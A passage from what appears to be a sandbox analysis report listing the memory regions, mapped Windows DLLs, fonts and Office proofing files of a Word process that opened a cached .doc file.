0x7ffb52fe0000 end_va = 0x7ffb53006fff monitored = 0 entry_point = 0x7ffb52ff0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1024 start_va = 0x7ffb52fa0000 end_va = 0x7ffb52fd9fff monitored = 0 entry_point = 0x7ffb52fa8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1025 start_va = 0x1912b420000 end_va = 0x1912b420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b420000" filename = "" Region: id = 1026 start_va = 0x5465c00000 end_va = 0x5465cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465c00000" filename = "" Region: id = 1027 start_va = 0x7ffb46210000 end_va = 0x7ffb4622dfff monitored = 0 entry_point = 0x7ffb4621ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1028 start_va = 0x1912b410000 end_va = 0x1912b419fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1032 start_va = 0x1912b420000 end_va = 0x1912b42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b420000" filename = "" Region: id = 1033 start_va = 0x19165a20000 end_va = 0x19165d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019165a20000" filename = "" Region: id = 1034 start_va = 0x1912b430000 end_va = 0x1912b43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b430000" filename = "" Region: id = 1035 start_va = 0x19166820000 end_va = 0x19166b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019166820000" filename = "" Region: id = 1036 start_va = 0x1912b420000 end_va = 0x1912b42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b420000" filename = "" Region: id = 1037 start_va = 0x1912b430000 end_va = 0x1912b43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b430000" filename = "" Region: id = 1038 start_va = 0x1912b3f0000 end_va = 0x1912b3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3f0000" filename = "" Region: id = 1039 start_va = 0x19168720000 end_va = 0x19168a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019168720000" filename = "" Region: id = 1040 start_va = 0x1912b420000 end_va = 0x1912b42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b420000" filename = "" Region: id = 1041 start_va = 0x19169d20000 end_va = 0x1916a01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019169d20000" filename = "" Region: id = 1042 start_va = 0x1912b3f0000 end_va = 0x1912b3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3f0000" filename = "" Region: id = 1043 start_va = 0x1912b420000 end_va = 0x1912b42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b420000" filename = "" Region: id = 1044 start_va = 0x1916a820000 end_va = 0x1916ab1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001916a820000" filename = "" Region: id = 1045 start_va = 0x1912b430000 end_va = 0x1912b43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b430000" filename = "" Region: id = 1046 start_va = 0x1912b420000 end_va = 0x1912b42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b420000" filename = "" Region: id = 1051 start_va = 0x7ffb53500000 end_va = 0x7ffb53516fff monitored = 0 entry_point = 0x7ffb53501390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1052 start_va = 0x7ffb4b100000 end_va = 0x7ffb4b10bfff monitored = 0 entry_point = 0x7ffb4b101860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1080 start_va = 0x1912c750000 end_va = 0x1912cc41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c750000" filename = "" Region: id = 1081 start_va = 0x7ffb4c8b0000 end_va = 0x7ffb4c8cefff monitored = 0 entry_point = 0x7ffb4c8c5450 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 1086 start_va = 0x1912b3f0000 end_va = 0x1912b3fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b3f0000" filename = "" Region: id = 1088 start_va = 0x1912b430000 end_va = 0x1912b431fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b430000" filename = "" Region: id = 1089 start_va = 0x1912b450000 end_va = 0x1912b450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b450000" filename = "" Region: id = 1091 start_va = 0x7ffb53f30000 end_va = 0x7ffb53f84fff monitored = 0 entry_point = 0x7ffb53f47970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1093 start_va = 0x1912b450000 end_va = 0x1912b460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1094 start_va = 0x7ffb52960000 end_va = 0x7ffb52990fff monitored = 0 entry_point = 0x7ffb52967d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1095 start_va = 0x7ffb40890000 end_va = 0x7ffb4092bfff monitored = 0 entry_point = 0x7ffb408e96a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 1096 start_va = 0x7ffb4d690000 end_va = 0x7ffb4d7c5fff monitored = 0 entry_point = 0x7ffb4d6bf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1097 start_va = 0x7ffb47c30000 end_va = 0x7ffb47c7ffff monitored = 0 entry_point = 0x7ffb47c32580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 1098 start_va = 0x19136220000 end_va = 0x1913721ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019136220000" filename = "" Region: id = 1099 start_va = 0x1912f2f0000 end_va = 0x1912f359fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "7e2cf2a2.doc" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.MSO\\7E2CF2A2.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.mso\\7e2cf2a2.doc") Region: id = 1102 start_va = 0x7ffb52880000 end_va = 0x7ffb5288bfff monitored = 0 entry_point = 0x7ffb528827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1103 start_va = 0x1912b430000 end_va = 0x1912b43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b430000" filename = "" Region: id = 1104 start_va = 0x1916cc20000 end_va = 0x1916cf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001916cc20000" filename = "" Region: id = 1105 start_va = 0x1912b470000 end_va = 0x1912b47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b470000" filename = "" Region: id = 1106 start_va = 0x1916ed20000 end_va = 0x1916f01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001916ed20000" filename = "" Region: id = 1107 start_va = 0x1912b430000 end_va = 0x1912b43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b430000" filename = "" Region: id = 1108 start_va = 0x1912b470000 end_va = 0x1912b47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b470000" filename = "" Region: id = 1109 start_va = 0x7ffb53330000 end_va = 0x7ffb533c8fff monitored = 0 entry_point = 0x7ffb5335f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1110 start_va = 0x19136220000 end_va = 0x1913721ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019136220000" filename = "" Region: id = 1111 start_va = 0x1912f2f0000 end_va = 0x1912f36ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{06f709fa-4f6f-4e7b-a27c-4923d671eb28}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{06F709FA-4F6F-4E7B-A27C-4923D671EB28}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{06f709fa-4f6f-4e7b-a27c-4923d671eb28}.tmp") Region: id = 1265 start_va = 0x7ffb48ed0000 end_va = 0x7ffb48ee0fff monitored = 0 entry_point = 0x7ffb48ed2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1266 start_va = 0x7ffb4a2b0000 end_va = 0x7ffb4a32efff monitored = 0 entry_point = 0x7ffb4a2c7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1268 start_va = 0x7ffb49070000 end_va = 0x7ffb49083fff monitored = 0 entry_point = 0x7ffb49071800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1848 start_va = 0x7ffb488c0000 end_va = 0x7ffb489b5fff monitored = 0 entry_point = 0x7ffb488f9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1898 start_va = 0x7ffb4f6e0000 end_va = 0x7ffb4f71dfff monitored = 0 entry_point = 0x7ffb4f6ea050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1899 start_va = 0x1912b420000 end_va = 0x1912b423fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1900 start_va = 0x1912c750000 end_va = 0x1912c794fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 1901 start_va = 0x1912b430000 end_va = 0x1912b433fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1902 start_va = 0x1912c7a0000 end_va = 0x1912c82dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1903 start_va = 0x1912c830000 end_va = 0x1912c840fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1904 start_va = 0x5465d00000 end_va = 0x5465dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465d00000" filename = "" Region: id = 1905 start_va = 0x7ff711940000 end_va = 0x7ff71194ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff711940000" filename = "" Region: id = 1906 start_va = 0x7ffb46db0000 end_va = 0x7ffb46dbcfff monitored = 0 entry_point = 0x7ffb46db1ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 1907 start_va = 0x7ffb46f50000 end_va = 0x7ffb4702afff monitored = 0 entry_point = 0x7ffb46f628b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1908 start_va = 0x7ffb470a0000 end_va = 0x7ffb470c5fff monitored = 0 entry_point = 0x7ffb470a1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1909 start_va = 0x1912b480000 end_va = 0x1912b480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b480000" filename = "" Region: id = 1913 start_va = 0x1912c850000 end_va = 0x1912c851fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c850000" filename = "" Region: id = 1914 start_va = 0x1912c860000 end_va = 0x1912c861fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c860000" filename = "" Region: id = 1915 start_va = 0x19137220000 end_va = 0x19137711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019137220000" filename = "" Region: id = 1916 start_va = 0x7ffb33a30000 end_va = 0x7ffb33b8bfff monitored = 0 entry_point = 0x7ffb33a75be0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 1917 start_va = 0x7ffb52bd0000 end_va = 0x7ffb52beefff monitored = 0 entry_point = 0x7ffb52bd5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1918 start_va = 0x1912c870000 end_va = 0x1912c870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c870000" filename = "" Region: id = 1919 start_va = 0x1912c880000 end_va = 0x1912c966fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 1920 start_va = 0x7ffb48120000 end_va = 0x7ffb48169fff monitored = 0 entry_point = 0x7ffb48125800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 1921 start_va = 0x1912c970000 end_va = 0x1912c97ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912c970000" filename = "" Region: id = 1922 start_va = 0x7ffb4b0d0000 end_va = 0x7ffb4b0e1fff monitored = 0 entry_point = 0x7ffb4b0d3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1923 start_va = 0x19137720000 end_va = 0x19137adcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019137720000" filename = "" Region: id = 1924 start_va = 0x1912b400000 end_va = 0x1912b403fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1925 start_va = 0x1912c970000 end_va = 0x1912c988fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001f.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000001f.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001f.db") Region: id = 1926 start_va = 0x1912c990000 end_va = 0x1912c993fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1927 start_va = 0x1912c970000 end_va = 0x1912ca6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912c970000" filename = "" Region: id = 1928 start_va = 0x19137ae0000 end_va = 0x19137e9cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019137ae0000" filename = "" Region: id = 1929 start_va = 0x1912b400000 end_va = 0x1912b400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b400000" filename = "" Region: id = 1930 start_va = 0x1912b400000 end_va = 0x1912b40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b400000" filename = "" Region: id = 1931 start_va = 0x1912ca70000 end_va = 0x1912ca7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ca70000" filename = "" Region: id = 1932 start_va = 0x1912ca80000 end_va = 0x1912ca8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ca80000" filename = "" Region: id = 1933 start_va = 0x1912ca90000 end_va = 0x1912ca9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ca90000" filename = "" Region: id = 1934 start_va = 0x1912ca80000 end_va = 0x1912ca8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ca80000" filename = "" Region: id = 1935 start_va = 0x1912ca90000 end_va = 0x1912ca9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ca90000" filename = "" Region: id = 1936 start_va = 0x1912ca80000 end_va = 0x1912ca8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ca80000" filename = "" Region: id = 1937 start_va = 0x1912ca90000 end_va = 0x1912ca9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ca90000" filename = "" Region: id = 1938 start_va = 0x1912caa0000 end_va = 0x1912caaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912caa0000" filename = "" Region: id = 1939 start_va = 0x1912cab0000 end_va = 0x1912cabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cab0000" filename = "" Region: id = 1940 start_va = 0x1912caa0000 end_va = 0x1912caaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912caa0000" filename = "" Region: id = 1941 start_va = 0x1912cab0000 end_va = 0x1912cabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cab0000" filename = "" Region: id = 1942 start_va = 0x1912cac0000 end_va = 0x1912cacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cac0000" filename = "" Region: id = 1943 start_va = 0x1912cad0000 end_va = 0x1912cadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cad0000" filename = "" Region: id = 1944 start_va = 0x1912cae0000 end_va = 0x1912caeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cae0000" filename = "" Region: id = 1945 start_va = 0x1912caa0000 end_va = 0x1912cab1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 1946 start_va = 0x1912cac0000 end_va = 0x1912cac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cac0000" filename = "" Region: id = 1947 start_va = 0x1912cac0000 end_va = 0x1912cbc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cac0000" filename = "" Region: id = 1948 start_va = 0x1912cac0000 end_va = 0x1912cbc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cac0000" filename = "" Region: id = 1949 start_va = 0x1912cac0000 end_va = 0x1912cbc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cac0000" filename = "" Region: id = 1950 start_va = 0x1912cac0000 end_va = 0x1912cac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cac0000" filename = "" Region: id = 1951 start_va = 0x1912cac0000 end_va = 0x1912cbc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cac0000" filename = "" Region: id = 1952 start_va = 0x1912cac0000 end_va = 0x1912cbc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cac0000" filename = "" Region: id = 1953 start_va = 0x1912cac0000 end_va = 0x1912cac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cac0000" filename = "" Region: id = 1954 start_va = 0x19137ea0000 end_va = 0x19138e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019137ea0000" filename = "" Region: id = 1960 start_va = 0x1912cac0000 end_va = 0x1912caccfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cac0000" filename = "" Region: id = 1961 start_va = 0x1912cad0000 end_va = 0x1912cadcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cad0000" filename = "" Region: id = 1962 start_va = 0x7ffb3fcc0000 end_va = 0x7ffb3fd13fff monitored = 0 entry_point = 0x7ffb3fcdcecc region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\office16\\msproof7.dll") Region: id = 1963 start_va = 0x1912cae0000 end_va = 0x1912cae0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 1970 start_va = 0x1912cae0000 end_va = 0x1912cae1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cae0000" filename = "" Region: id = 1971 start_va = 0x1912caf0000 end_va = 0x1912caf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912caf0000" filename = "" Region: id = 1972 start_va = 0x1912cb00000 end_va = 0x1912cb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb00000" filename = "" Region: id = 1973 start_va = 0x1912cb10000 end_va = 0x1912cb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb10000" filename = "" Region: id = 1974 start_va = 0x7ff711930000 end_va = 0x7ff71193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff711930000" filename = "" Region: id = 1975 start_va = 0x1912cb00000 end_va = 0x1912cb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cb00000" filename = "" Region: id = 1976 start_va = 0x1912cb00000 end_va = 0x1912cbf5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 1977 start_va = 0x1912cc00000 end_va = 0x1912cc01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc00000" filename = "" Region: id = 1978 start_va = 0x1912cc10000 end_va = 0x1912cc11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc10000" filename = "" Region: id = 1979 start_va = 0x1912cc20000 end_va = 0x1912cc21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc20000" filename = "" Region: id = 1980 start_va = 0x1912cc30000 end_va = 0x1912cc31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc30000" filename = "" Region: id = 1981 start_va = 0x1912cc40000 end_va = 0x1912cc40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912cc40000" filename = "" Region: id = 1982 start_va = 0x1912f370000 end_va = 0x1912f510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cambria.ttc" filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc") Region: id = 1983 start_va = 0x1912ce70000 end_va = 0x1912ce71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912ce70000" filename = "" Region: id = 1984 start_va = 0x1912f0b0000 end_va = 0x1912f0b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f0b0000" filename = "" Region: id = 1985 start_va = 0x1912f0c0000 end_va = 0x1912f0c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f0c0000" filename = "" Region: id = 1986 start_va = 0x1912f0d0000 end_va = 0x1912f0d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f0d0000" filename = "" Region: id = 1987 start_va = 0x1912f0e0000 end_va = 0x1912f0e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f0e0000" filename = "" Region: id = 1988 start_va = 0x1912f520000 end_va = 0x1912f521fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f520000" filename = "" Region: id = 1989 start_va = 0x1912f530000 end_va = 0x1912f531fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f530000" filename = "" Region: id = 1990 start_va = 0x1912f540000 end_va = 0x1912f541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f540000" filename = "" Region: id = 1991 start_va = 0x19138e70000 end_va = 0x19138f63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 1992 start_va = 0x1912f550000 end_va = 0x1912f551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f550000" filename = "" Region: id = 1993 start_va = 0x1912f560000 end_va = 0x1912f561fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f560000" filename = "" Region: id = 1994 start_va = 0x1912f570000 end_va = 0x1912f571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f570000" filename = "" Region: id = 1995 start_va = 0x1912f580000 end_va = 0x1912f581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f580000" filename = "" Region: id = 1996 start_va = 0x1912f590000 end_va = 0x1912f591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f590000" filename = "" Region: id = 1997 start_va = 0x1912f5a0000 end_va = 0x1912f5a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912f5a0000" filename = "" Region: id = 2000 start_va = 0x1912cae0000 end_va = 0x1912caeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cae0000" filename = "" Region: id = 2001 start_va = 0x19138f70000 end_va = 0x19139043fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Region: id = 2002 start_va = 0x1912cae0000 end_va = 0x1912cae9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912cae0000" filename = "" Region: id = 2003 start_va = 0x1912caf0000 end_va = 0x1912caf9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912caf0000" filename = "" Region: id = 2004 start_va = 0x7ffb33960000 end_va = 0x7ffb33a2cfff monitored = 0 entry_point = 0x7ffb33969d9c region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files\\microsoft office\\office16\\proof\\msspell7.dll") Region: id = 2005 start_va = 0x7ffb338d0000 end_va = 0x7ffb3395cfff monitored = 0 entry_point = 0x7ffb338d77b8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\proof\\1033\\msgr8en.dll") Region: id = 2006 start_va = 0x1912f370000 end_va = 0x1912f4f7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft 